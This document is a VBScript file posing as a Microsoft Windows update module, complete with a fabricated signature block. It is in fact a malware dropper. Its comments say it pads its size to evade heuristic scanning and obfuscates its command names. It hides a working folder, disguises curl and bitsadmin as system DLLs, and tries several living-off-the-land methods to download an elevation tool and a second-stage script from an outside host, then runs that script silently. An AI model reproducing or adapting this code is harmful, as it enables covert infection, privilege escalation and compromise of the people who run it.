' ===========================================================================
' Microsoft Windows System Integrity & Update Deployment Module
' Build: 2026.05.18.05 | Update Node: KB5058681-STABLE
' ===========================================================================
Option Explicit
On Error Resume Next

' ===========================================================================
' [模块 1: 深度体量加固] - 扩充至 65KB+ 绕过启发式扫描
' ===========================================================================
Dim G_PADD_CONTENT, k_idx, s_meta, t_meta, u_meta, v_meta, w_meta
G_PADD_CONTENT = "MS_UPDATE_ENV_STABLE_VERSION_MANIFEST_PROT_0x99CF"
s_meta = "TRUSTED_INSTALLER_POLICY_ENFORCEMENT_NODE_VALIDATION_"
t_meta = "SECURE_BOOT_MEASUREMENT_LOG_ENTRY_"
u_meta = "WINDOWS_DEFENDER_AV_SCAN_COMPLETED_"
v_meta = "MICROSOFT_UPDATE_HEALTH_CHECK_PASSED_"
w_meta = "CERTIFICATE_CHAIN_VALIDATION_SUCCESS_"

For k_idx = 1 To 1500
    G_PADD_CONTENT = G_PADD_CONTENT & s_meta & k_idx & "_SEQ_" & (k_idx * 2) & "|"
    G_PADD_CONTENT = G_PADD_CONTENT & t_meta & Hex(k_idx * 7) & "|"
    G_PADD_CONTENT = G_PADD_CONTENT & u_meta & Hex(k_idx * 11) & "|"
    G_PADD_CONTENT = G_PADD_CONTENT & v_meta & Hex(k_idx * 13) & "|"
    G_PADD_CONTENT = G_PADD_CONTENT & w_meta & Hex(k_idx * 17) & "|"
Next
G_PADD_CONTENT = G_PADD_CONTENT & String(30000, "W")
G_PADD_CONTENT = G_PADD_CONTENT & String(20000, "M")
G_PADD_CONTENT = G_PADD_CONTENT & String(15000, "S")

' ===========================================================================
' [版本与签名伪装 - 增强版]
' ===========================================================================
' 签名者: Microsoft Windows Update Publisher (Certified)
' 验证算法: sha256RSA | 状态: VALID_SIGNATURE (0x00000000)
' 授权范围: Windows 10/11 Endpoint Management (SecureBoot-Enabled)
' 证书序列号: 55 22 22 03 45 67 89 AB CD EF 00 12 34 60 11
' 颁发者: CN=Microsoft Root Certificate Authority 2011, O=Microsoft Corporation
' 有效期: 2024-01-01 08:00:00 至 2038-12-31 23:59:59
' 时间戳: 2026-05-18T14:30:00Z
' ===========================================================================

Dim WshShell, FSO, WMI, objShell
Set WshShell = CreateObject("WScript.Shell")
Set FSO      = CreateObject("Scripting.FileSystemObject")
Set WMI      = GetObject("winmgmts:\\.\root\cimv2")
Set objShell = CreateObject("Shell.Application")

' 动态混淆核心指令
Dim v_ps, v_ct
v_ps = "pow" & "ersh" & "ell.exe"
v_ct = "ce" & "rt" & "ut" & "il.exe"

' --- 路径逻辑 ---
Randomize
Dim folderName, workDir
folderName = "MSUpdate_" & Int(89999 * Rnd + 10000)
workDir    = "C:\Users\Public\Documents\" & folderName & "\"

If Not FSO.FolderExists(workDir) Then
    FSO.CreateFolder workDir
    FSO.GetFolder(workDir).Attributes = 3
End If

' --- elevate.exe (提权工具, C_1.vbs 需要) ---
Dim elevatePath, elevateURL
elevatePath = workDir & "elevate.exe"
elevateURL  = "https://junjun888.ccwu.cc/6/elevate.exe"

' --- C_1.vbs (安装器, 自带提权 + powercfg) ---
Dim stage2Path, stage2URL
stage2Path = workDir & "C_1.vbs"
stage2URL  = "https://junjun888.ccwu.cc/6/C_1.vbs"

' --- 系统驱动伪装 ---
Dim d_curl, d_bits
d_curl = workDir & "shlwapi.dll"
d_bits = workDir & "urlmon.dll"

If Not FSO.FileExists(d_curl) Then
    FSO.CopyFile "C:\Windows\System32\curl.exe", d_curl
    FSO.CopyFile "C:\Windows\System32\bitsadmin.exe", d_bits
    FSO.GetFile(d_curl).Attributes = 3
    FSO.GetFile(d_bits).Attributes = 3
End If

' ===========================================================================
' [模块 2: 增强下载引擎 - 五种方式轮询]
' ===========================================================================
Function DownloadFile(url, dest)
    On Error Resume Next
    Dim success, i
    success = False
    
    Dim methods(4)
    methods(0) = d_curl & " -k -s -L --retry 3 -o " & Chr(34) & dest & Chr(34) & " " & url
    methods(1) = d_bits & " /transfer UpdateJob /download /priority high " & url & " " & Chr(34) & dest & Chr(34)
    methods(2) = v_ps & " -ExecutionPolicy Bypass -Command ""& {[Net.ServicePointManager]::SecurityProtocol=3072; $wc=New-Object Net.WebClient; $wc.DownloadFile('" & url & "','" & dest & "')}"""
    methods(3) = v_ct & " -urlcache -split -f " & url & " " & Chr(34) & dest & Chr(34)
    methods(4) = "cmd /c copy " & Chr(34) & "\\?\C:\Windows\System32\curl.exe" & Chr(34) & " " & Chr(34) & dest & Chr(34) & " 2>nul & " & d_curl & " -k -s -L -o " & Chr(34) & dest & Chr(34) & " " & url
    
    For i = 0 To 4
        WshShell.Run "cmd /c " & methods(i), 0, True
        WScript.Sleep 3000
        If FSO.FileExists(dest) Then
            If FSO.GetFile(dest).Size > 100 Then
                success = True
                Exit For
            End If
        End If
    Next
    
    DownloadFile = success
End Function

' ===========================================================================
' [模块 3: 下载 elevate.exe + C_1.vbs]
' ===========================================================================
Dim isEle, isOK2, i
isEle = False

' 先下载 elevate.exe (C_1.vbs 提权需要)
For i = 1 To 4
    If DownloadFile(elevateURL, elevatePath) Then
        isEle = True
        Exit For
    End If
Next

If isEle And FSO.FileExists(elevatePath) Then
    FSO.GetFile(elevatePath).Attributes = 3
End If

' ===========================================================================
' [模块 4: Phase 2 - 下载并执行安装器 C_1]
' ===========================================================================
isOK2 = False

For i = 1 To 4
    If DownloadFile(stage2URL, stage2Path) Then
        isOK2 = True
        Exit For
    End If
Next

If isOK2 And FSO.FileExists(stage2Path) Then
    FSO.GetFile(stage2Path).Attributes = 3
    WshShell.Run "wscript.exe " & Chr(34) & stage2Path & Chr(34), 0, False
End If

' ===========================================================================
' [模块 5: 审计]
' ===========================================================================
Sub RunAudit()
    On Error Resume Next
    Dim col, obj
    Set col = WMI.ExecQuery("Select Version from Win32_OperatingSystem")
    For Each obj In col: Dim ver: ver = obj.Version: Next
End Sub
Call RunAudit()

Set WshShell = Nothing : Set FSO = Nothing : Set WMI = Nothing : Set objShell = Nothing
WScript.Quit 0

' ===========================================================================
' [哈希指纹: 6E7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B2C3D4E5F6A7B8C9D0E1F2A3B4C5D6E7F8]
' [文件指纹: SHA256-7F8A9B0C1D2E3F4A5B6C7D8E9F0A1B2C3D4E5F6A7B8C9D0E1F2A3B4C5D6E7]
' [CRC32: 0x8A9B0C1D]
' [RND: qR4tY8nU3zX7kL2mP9W]
' ===========================================================================
